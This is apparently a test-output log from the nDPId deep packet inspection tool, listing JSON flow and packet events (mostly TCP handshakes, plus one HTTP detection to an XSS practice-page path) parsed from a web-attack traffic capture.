+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0VBz69jzGwu7IaAScSDHVQAAAgQFtAQCCAoD4zgeATlmpwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03YhAAD4G6E+sEAABwKgKMtFQAFAbC7shc+vY9IAQAOVmXAAAAQEICgE5ZqgD4zge"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347098746,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347098746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gixAAD4GQ6SsEAABwKgKMtFeAFA\/7+XFAAAAAKACchD+fQAAAgQFtAQCCAoBOWfpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1499347098746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0V6c5l18P+\/lxqAScSDHtgAAAgQFtAQCCAoD4zlgATln6QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1499347098747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347098747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gi1AAD4GQ6usEAABwKgKMtFeAFA\/7+XGnOZdfYAQAOVmvgAAAQEICgE5Z+kD4zlg"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347101314,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347101314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} +00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1499347102610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347102610,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ux9AAD4GCrmsEAABwKgKMtGGAFBKzdCyBp+dBoAQAOW\/\/wAAAQEICgE5a68D4z0l"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347105154,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347105154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eX9AAD4GTFGsEAABwKgKMtGgAFC6fhdUAAAAAKACchBL3AAAAgQFtAQCCAoBOW4rAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0aA4hAGdun4XVaAScSDPFAAAAgQFtAQCCAoD4z+iATluKwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1499347105154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eYBAAD4GTFisEAABwKgKMtGgAFC6fhdVOIQBnoAQAOVuHAAAAQEICgE5bisD4z+i"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347106438,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347106438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kWRAAD4GNGysEAABwKgKMtGuAFDha\/4IAAAAAKACchA86wAAAgQFtAQCCAoBOW9sAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1499347106438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0a4RPd924Wv+CaAScSAIUAAAAgQFtAQCCAoD40DjATlvbAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1499347106439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347106439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kWVAAD4GNHOsEAABwKgKMtGuAFDha\/4JET3fd4AQAOWnVwAAAQEICgE5b2wD40Dj"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347107719,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347107719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347110266,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347110266,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u39AAD4GClGsEAABwKgKMtHWAFDeH8hWAAAAAKACchByBAAAAgQFtAQCCAoBOXMpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0dbJG1vv3h\/IV6AScSAFVQAAAgQFtAQCCAoD40SgATlzKQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1499347110267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347110267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u4BAAD4GClisEAABwKgKMtHWAFDeH8hXyRtb8IAQAOWkXAAAAQEICgE5cykD40Sg"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347111565,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347111565,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ioRAAD4GO0ysEAABwKgKMtHkAFDzev7qAAAAAKACchAkwgAAAgQFtAQCCAoBOXRuAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0eR9BdLY83r+66AScSCL+wAAAgQFtAQCCAoD40XkATl0bgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ioVAAD4GO1OsEAABwKgKMtHkAFDzev7rfQXS2YAQAOUrAwAAAQEICgE5dG4D40Xk"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347114111,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347114111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8emxAAD4GS2SsEAABwKgKMtH+AFCQhwyGAAAAAKACchB3hAAAAgQFtAQCCAoBOXbqAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0f6FLaNRkIcMh6AScSADoAAAAgQFtAQCCAoD40hhATl26gEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1499347114112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347114112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0em1AAD4GS2usEAABwKgKMtH+AFCQhwyHhS2jUoAQAOWipgAAAQEICgE5dusD40hh"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347115408,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347115408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 